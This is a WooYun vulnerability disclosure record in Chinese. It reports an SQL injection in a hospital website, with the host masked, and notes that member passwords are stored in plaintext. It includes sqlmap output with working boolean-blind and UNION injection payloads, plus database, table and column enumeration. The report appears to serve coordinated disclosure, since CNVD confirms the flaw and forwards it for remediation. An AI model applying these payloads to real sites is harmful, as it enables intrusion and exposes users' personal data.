乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-23: 细节已通知厂商并且等待厂商处理中 2015-11-27: 厂商已经确认,细节仅向厂商公开 2015-12-07: 细节向核心白帽子及相关领域专家公开 2015-12-17: 细节向普通白帽子公开 2015-12-27: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
安徽中医药大学第二附属医院官网存在SQL注入漏洞
注入点:http://**.**.**.**/include/web_content.php?id=727
sqlmap identified the following injection point(s) with a total of 148 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=727 AND 4209=4209 Type: UNION query Title: MySQL UNION query (41) - 21 columns Payload: id=-8924 UNION ALL SELECT 41,41,41,41,41,CONCAT(0x71626a7071,0x646b5a53784166556376,0x71706a7171),41,41,41,41,41,41,41,41,41,41,41,41,41,41,41#---web server operating system: Linux CentOSweb application technology: Apache 2.2.27, PHP 5.2.17back-end DBMS: MySQL >= 5.0.0sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=727 AND 4209=4209 Type: UNION query Title: MySQL UNION query (41) - 21 columns Payload: id=-8924 UNION ALL SELECT 41,41,41,41,41,CONCAT(0x71626a7071,0x646b5a53784166556376,0x71706a7171),41,41,41,41,41,41,41,41,41,41,41,41,41,41,41#---web server operating system: Linux CentOSweb application technology: Apache 2.2.27, PHP 5.2.17back-end DBMS: MySQL 5available databases [3]:[*] information_schema[*] test[*] user_ahz_ahzjyyDatabase: user_ahz_ahzjyy[58 tables]+-------------------+| web_ads || web_ads_ty || web_author || web_bbs || web_bbs_ty || web_bmxx || web_bmxx_counter || web_bmxx_ty || web_branch || web_coll || web_coll_guest || web_coll_ty || web_content || web_content_ty || web_down || web_down_ty || web_guestbook || web_hack || web_hack_ty || web_impart || web_infomation || web_infomation_ty || web_inter || web_inter_ty || web_lead || web_lead_info || web_lead_mail || web_lead_ty || web_link || web_link_ty || web_live || web_live_link || web_live_memoir || web_live_pic || web_log || web_menu || web_server || web_server_down || web_server_info || web_server_ty || web_service_bs || web_service_ty || web_source || web_title || web_topic || web_topic_info || web_topic_ty || web_user || web_user_priv || web_visit || web_vod || web_vod_ty || web_vote || web_vote_item || web_vote_log || web_vote_txt || web_vote_ty || web_zchy |+-------------------+
会员表
Database: user_ahz_ahzjyy+----------+---------+| Table | Entries |+----------+---------+| web_zchy | 533 |+----------+---------+Table: web_zchy[11 columns]+------------+------------------+| Column | Type |+------------+------------------+| id | int(10) unsigned || isshow | char(1) || sendbranch | int(11) || user_dw | varchar(100) || user_email | varchar(100) || user_name | varchar(20) || user_pwd | varchar(100) || user_qq | int(20) || user_sf | varchar(100) || user_zwjs | text || zs_name | varchar(20) |+------------+------------------+
密码是明文存储的
危害等级:中
漏洞Rank:10
确认时间:2015-11-27 15:07
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给安徽分中心,由安徽分中心后续协调网站管理单位处置。
暂无